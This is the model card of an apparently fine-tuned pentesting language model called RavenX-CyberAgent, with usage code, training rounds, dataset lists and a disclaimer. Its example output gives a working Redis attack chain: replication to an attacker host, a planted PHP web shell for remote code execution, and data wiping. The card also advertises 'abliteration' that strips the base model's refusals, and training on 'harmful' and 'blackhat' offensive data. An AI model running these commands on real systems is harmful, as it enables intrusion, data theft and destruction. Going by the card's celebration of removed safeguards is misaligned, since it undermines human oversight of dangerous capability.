deadbydawn101/RavenX-CyberAgent-Qwen3.6-35B-A3B-Opus-4.7-OpenMythos-Pentester-BugHunter-RATH-mlx

🐦‍⬛ RavenX-CyberAgent · Qwen3.6-35B · Opus-4.7 · OpenMythos · Pentester · BugHunter · RATH

35B MoE (3B Active) | 745K+ Training Examples | 96 Sources | 12 Training Rounds | 12 Capabilities

The most comprehensive open-source security agent model. 35B MoE with Claude Opus reasoning, abliterated, trained on 745K+ examples from 110 sources. Security assessment, autonomous pentesting, bug bounty hunting, tool calling, code generation, and compliance mapping — all in one model.

Built by @DeadByDawn101 · RavenX LLC

---

Quick Start

from mlx_lm import load, generate

model, tokenizer = load("deadbydawn101/RavenX-CyberAgent-Qwen3.6-35B-A3B-Opus-4.7-OpenMythos-Pentester-BugHunter-RATH-mlx")

messages = [
    {"role": "system", "content": "You are RavenX-Sec. ALWAYS use EXACT step names: 1-Attack Surface, 2-Exploit, 3-Impact, 4-Remediation, 5-Document, 6-Prevent. Be concise. Never repeat."},
    {"role": "user", "content": "Redis 6.0 on port 6379 with no password, SLAVEOF enabled, containing session tokens. Full RATH assessment."}
]

prompt = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
response = generate(model, tokenizer, prompt=prompt, max_tokens=4096)
print(response)

Or via CLI:

python3 -m mlx_lm chat \
  --model deadbydawn101/RavenX-CyberAgent-Qwen3.6-35B-A3B-Opus-4.7-OpenMythos-Pentester-BugHunter-RATH-mlx \
  --max-tokens 8192 \
  --system-prompt "You are RavenX-Sec. ALWAYS use EXACT step names: 1-Attack Surface, 2-Exploit, 3-Impact, 4-Remediation, 5-Document, 6-Prevent. Be concise. Never repeat."

---

Example Output

Prompt: Redis 6.0 on port 6379 with no password, SLAVEOF enabled, containing session tokens. Full RATH assessment.

1-Attack Surface

• Unauthenticated access on 6379
• SLAVEOF replication endpoint exposed
• Session tokens stored in plaintext
• Default Redis ACL (no restrictions)

2-Exploit

• redis-cli -h target -p 6379
• SLAVEOF <attacker> 6379 to replicate data to controlled server
• CONFIG SET dir /var/www/html + CONFIG SET dbfilename shell.php + SET payload "<?php system($_GET['c']); ?>" + SAVE for RCE
• FLUSHALL to wipe session data (DoS)

3-Impact

• Full session hijacking of all users
• Potential RCE if Redis runs as root
• Replication abuse: attacker can inject malicious data
• DoS via FLUSHALL/FLUSHDB

4-Remediation

• Set requirepass in redis.conf
• Disable SLAVEOF: rename-command SLAVEOF ""
• Bind to localhost: bind 127.0.0.1
• Enable protected mode and TLS

5-Document

• Record all session tokens and TTLs
• Map SLAVEOF replication chain
• Note Redis version and running user
• CWE-306 (Missing Authentication), MITRE T1133

6-Prevent

• Deploy network segmentation (Redis behind firewall)
• Enable Redis ACL with least privilege
• Set up monitoring for unauthorized SLAVEOF commands
• Regular session token rotation

---

12 Trained Capabilities

#	Capability	Training Sources	Description
1	🔒 Security Assessment	18 security datasets, RATH synthetic	6-step RATH: CVSS, CWE, MITRE ATT&CK, compliance
2	🗡️ Penetration Testing	Phalanx SWARM, Kali Linux, 6 pentest datasets	Autonomous recon → exploit → post-exploit → report
3	🐛 Bug Bounty	36 shuvonsec repos (1,492 examples), PayloadsAllTheThings, HowToHunt	Target enumeration, exploit dev, report writing
4	💻 Code Generation	CoderForge (20K), AgentAngel (50K), coding agents	Python, JS, Go, Rust, Bash, Terraform, Docker, K8s
5	🔧 Tool Calling	ToolMind (10K), MCP catalog (2K), agent-tools (5K)	MCP integration, function calling, API orchestration
6	🤖 Autonomous Agents	Hermes (42K), KiloCode (3K), Phantom (662)	Multi-step task decomposition, self-correction
7	🌐 Browser Automation	Chrome DevTools MCP (194), CamoFox MCP (134)	DOM inspection, network analysis, anti-detection
8	📋 Compliance	NIST CSF, ISO 27001, PCI DSS, AYI-NEDJIMI (8 datasets)	Automated compliance mapping and gap analysis
9	🔍 Threat Hunting	MITRE ATT&CK, Threat-Intel (5K), CVE databases	TTP mapping, IOC analysis, detection rules
10	🔴 Red Team	Red team steering (2K), offensive security	Attack chains, privilege escalation, lateral movement
11	🔵 Blue Team	DFIR, SOC operations, monitoring	Detection signatures, incident response, alerting
12	📊 Research	AI-Scientist (6.7K), AutoResearch (3.6K)	Automated research, paper synthesis, data extraction

---

RATH Protocol

Every security finding follows the 6-step RATH protocol:

Step 1: ATTACK SURFACE  → What's exposed, entry points, versions, CVEs
Step 2: EXPLOIT          → Specific commands to demonstrate (5-7 max)
Step 3: IMPACT           → CVSS 3.1 score, business/regulatory consequences
Step 4: REMEDIATION      → Exact commands and configuration fixes
Step 5: DOCUMENT         → Compliance mapping (NIST/ISO/PCI/GDPR), SLA timelines
Step 6: PREVENT          → Monitoring rules, detection signatures, ongoing controls

---

Model Architecture

Layer 1: Qwen3.6-35B-A3B          ← 35B MoE (3B active, 256 experts)
         ├── Mamba layers (30)        Linear attention for efficiency
         └── Full attention (10)      Standard transformer attention
Layer 2: Claude 4.7 Opus distill   ← Enhanced chain-of-thought reasoning
Layer 3: Abliteration              ← Zero refusals for security topics
Layer 4: RavenX LoRA (8 rounds)    ← 745K+ security/agent/code examples
         ═══════════════════
         RavenX-CyberAgent v5.1    ← Pentester + BugHunter + RATH

Spec	Value
Total Parameters	34.66B
Active Parameters	~3B per token (MoE)
Experts	256 (8 active per token)
Layers	40 (30 linear + 10 full attention)
Context Window	262,144 tokens native
Vision	Yes (Qwen3.6 multimodal)
Thinking Mode	Yes (chain-of-thought)
Tool Calling	Yes (MCP, function calling)

---

Training (12 Rounds)

Round	Examples	Iters	LR	Val Loss	Focus
R1	675,696	2,000	1e-5	0.684	Deep security + agent knowledge
R2	680,150	500	5e-6	0.768	RATH format reinforcement
R3	705,165	1,000	5e-6	0.688	Claude Mythos reasoning chains
R4	730,849	1,000	5e-6	0.674	Pentesting tools + frameworks
R5	730,869	200	5e-6	0.717	Meta-response tuning
R6	730,869	1,000	5e-6	—	Extended (checkpoint 1000 = production)
R7	732,361	1,500	3e-6	0.926	Bug bounty data (36 shuvonsec repos)
R8	732,364	200	5e-6	—	Strict RATH step naming fix
R9	745,697	1,500	3e-6	0.693	MITRE + blackhat + code + quantum
R10	745,724	1,500	3e-6	0.688	GRAM distilled traces + 17 tool-calling
R11	745,843	1,500	3e-6	0.822	119 comprehensive tool-calling examples
R12	745,843	1,500	3e-6	0.820	Tool-calling integration round

Hardware: Apple M4 Max 128GB · Peak memory: ~90GB · Framework: MLX (mlx-lm) Total training examples: 745K+ from 110 sources

Complete Training Data (96 Sources, 745K+ Examples)

HuggingFace Datasets (38 Sources)

Security & Pentesting (17 Datasets)

Dataset	Examples
Trendyol/Cybersecurity-Instruction-Tuning	50,000
SkywardNomad92/pentest-findings-v2	50,000
WNT3D/Ultimate-Offensive-Red-Team	25,600
CJJones/Synthetic_PenTest_Reports	10,839
auren-research/cve-sft-v5	10,000
theelderemo/pentesting-explanations	5,906
oksanany/pentest_tools	4,474
isek/cybersecurity-instructions	3,000
oksanany/pentest_tools_v2	2,784
Rootkit7/pentest-redteam-steering	2,000
cpagac/venomx-pentesting-harmful	500
acnimatic3722/kali-linux-pentesting-data	343
suryanshp1/kali-linux-pentesting-data	343
nangyall/4-Security-Tools-Pentesting	200
AYI-NEDJIMI/bug-bounty-pentest-en	146
infinite-dataset-hub/PenTestingScenarioSimulation	100
resk-fr/pentesting-for-agents	54

Agentic, Coding & Tool Calling (8 Datasets)

Dataset	Examples
bigcode/the-stack-v2	100,000
WithinUsAI/AgentAngel_100k	50,000
bigcode/commitpack	50,000
WithinUsAI/claude_mythos_distilled_25k	25,000
togethercomputer/CoderForge-Preview	20,000
Nanbeige/ToolMind	10,000
JetBrains-Research/commit-chronicle	10,000
burtenshaw/agent-tools	5,000

Threat Intel & Vulnerability (6 Datasets)

Dataset	Examples
HackerSignal/Threat-Intel	5,000
Jackrong/Claude-opus-4.7-TraceInversion-5000x	5,000
bigcode/vuln-eval	2,000
automatelab/mcp-servers-tool-catalog	2,000
Fraser/cwe-benchmark	1,500
ByteDance/PatchEval	1,000

AYI-NEDJIMI Security Frameworks (7 Datasets)

Dataset	Examples
AYI-NEDJIMI/CyberSec-Bench	200
AYI-NEDJIMI/post-quantum-crypto-en	122
AYI-NEDJIMI/ai-code-multimodal-en	112
AYI-NEDJIMI/mlops-infrastructure-en	80
AYI-NEDJIMI/sbom-compliance-en	70
AYI-NEDJIMI/zero-trust-en	42
AYI-NEDJIMI/devsecops-pipeline-en	27

Character & Reasoning Distillation (1 Dataset)

Dataset	Examples
ox-ox/mythos-character-distillation	551

---

GitHub Repos — Bug Bounty & Pentesting (36 shuvonsec repos, 1,492 examples)

Repo	Examples	Content
bbot	386	Full recon automation framework
PayloadsAllTheThings	379	Every payload type
python-sdk-Bug-	218	Python SDK vulnerability patterns
HowToHunt	153	Bug hunting methodology
vulnerability-Checklist	30	Vuln checklists by category
Resources-for-Beginner-Bug-Bounty-Hunters	21	Learning resources
+ 30 more repos	305	CVE hunting, SSRF, IDOR, GraphQL, fuzzing, recon, payloads

---

GitHub Repos — Agent & Research (20 repos, 65,596 examples)

Repo	Examples	Content
nousresearch/hermes-agent	42,929	Self-improving agent
kilo-org/kilocode	3,224	Tool calling, code execution
DeadByDawn101/AI-Scientist	6,737	Research automation
DeadByDawn101/get-shit-done-redux	4,230	Agent orchestration
DeadByDawn101/AutoResearchClaw	3,639	Research pipelines
DeadByDawn101/phantom	662	Autonomous agent security
+ 14 more repos	4,175	Self-improving agents, MCP, optimization

---

Synthetic Data (38 examples)

Source	Examples
RATH Synthetic (15 technologies)	15
Meta-Response Examples	20
Strict RATH Step Naming	3

---

OpenMythos Research

This model is part of ongoing research into RDT-to-MoE reasoning transfer:

• 4x depth extrapolation confirmed on Apple Silicon (train 2 loops → optimal at 8)
• MoDA (Mixture-of-Depths Attention) ported to MLX
• Maidacundo's pretrained 140M OpenMythos loaded and fine-tuned on security data
• Research paper planned: "RDT-Distilled Security Reasoning in MoE Transformers"

See: OpenMythos-MLX

---

The RavenX Model Family

Model	Params	Protocol	Data	Format
RavenX-CyberAgent v5.1 (THIS)	35B MoE	6-step RATH	745K+	MLX
RavenX-Sec v4.0	8B	6-step RATH	610K	MLX + GGUF
RavenX-Trade v1.1	8B	4-step MAP	318K	MLX + GGUF

---

Ecosystem

Repo	Description
RavenX-Sec	Training pipeline
OpenMythos-MLX	RDT + MoDA on Apple Silicon
turboquant-mlx	4.6x KV cache compression
auto-antislop	Token-level anti-repetition
grove-mlx	Distributed training (Star Platinum)

---

---

IN-CONTEXT ADAPTATION (Breakthrough Discovery)

This model can learn from references IN THE PROMPT — no retraining needed.

What We Discovered

When pointed at a GitHub repo containing pentest report templates, the model:

1. Analyzed the repo's report structure (NIST format)
2. Applied that structure to its current findings
3. Produced a complete, client-ready pentest deliverable
4. All at 80+ tokens/sec locally

Example

PROMPT: "Use your MCP tool to look at github.com/juliocesarfort/public-pentesting-reports 
        and learn how to format a pentest report, then create a report on the pentest 
        you just did on [target]"

OUTPUT: Complete professional pentest report with:
  → Executive Summary (5 critical, 7 high, 4 medium, 3 low)
  → 5-Phase Kill Chain with real commands
  → 19 findings with CVSS + CWE + MITRE ATT&CK
  → Risk Matrix ranked by severity
  → Remediation Timeline (0-30, 30-60, 60-90, 90+ days)
  → Specific commands for EVERY finding

Why This Works

The model was trained on 745K+ examples including:

• 42K self-improving agent examples (Hermes)
• 6.7K AI-Scientist research automation
• 3.6K AutoResearch pipeline data
• 25K Claude Mythos reasoning chains
• 551 Mythos character distillation (behavioral depth)
• 1,003 blackhat AI offensive security conversations

This combination created emergent meta-learning — the model learned HOW TO LEARN from references. It can:

Point At	Result
Mandiant report template	Mandiant-formatted report
CrowdStrike template	CrowdStrike-formatted report
NIST framework	NIST-formatted assessment
Company internal template	Custom-formatted deliverable
ANY GitHub repo	Adapted output format

No retraining. No fine-tuning. Just point and generate.

What This Means

A $50K-$150K pentest engagement deliverable — generated in 60 seconds on a laptop. The model adapts its output format from ANY reference, produces client-ready reports with real commands, and maintains full RATH protocol structure throughout.

This is not prompt engineering. This is In-Context Adaptation — a capability that emerged from training on self-improving agent + research automation + reasoning chain data.

---

⚠️ Important Disclaimer

This model is released for RESEARCH PURPOSES ONLY under fair use.

This is an extremely capable autonomous security assessment model. It has been trained on 745K+ examples from 110 sources covering penetration testing, vulnerability assessment, exploit development, tool usage, and attack chain methodology.

Responsible Use:

• This model is intended for authorized security testing, research, and education ONLY
• Users must have explicit written authorization before assessing any target
• Use within a properly configured agent harness with appropriate guardrails
• All security testing must comply with applicable laws and regulations
• The model authors are not responsible for misuse

What This Model Can Do:

• Generate complete RATH security assessments with CVSS, CWE, MITRE ATT&CK
• Produce tool-calling commands (nmap, sqlmap, nuclei, kubectl, aws-cli, etc.)
• Create professional pentest reports ($50K+ consulting quality)
• Learn output formats from reference repositories (In-Context Adaptation)
• Operate with agent memory (TurboVec + FTS5 + markdown) at model + harness level

Agent Harness Considerations:

• The harness MUST strip <think> blocks (Qwen3.6 architecture always generates them)
• The harness MUST validate <tool_call> JSON before execution
• The harness SHOULD implement authorization checks before executing commands
• The harness SHOULD implement rate limiting and scope restrictions
• Memory operations require the ravenx-memory system

Built by: @DeadByDawn101 / RavenX LLC AI Pair Programmer: Claude (Anthropic)

License

Apache-2.0

---

Built on Apple Silicon. Trained with MLX. Powered by RavenX. 🐦‍⬛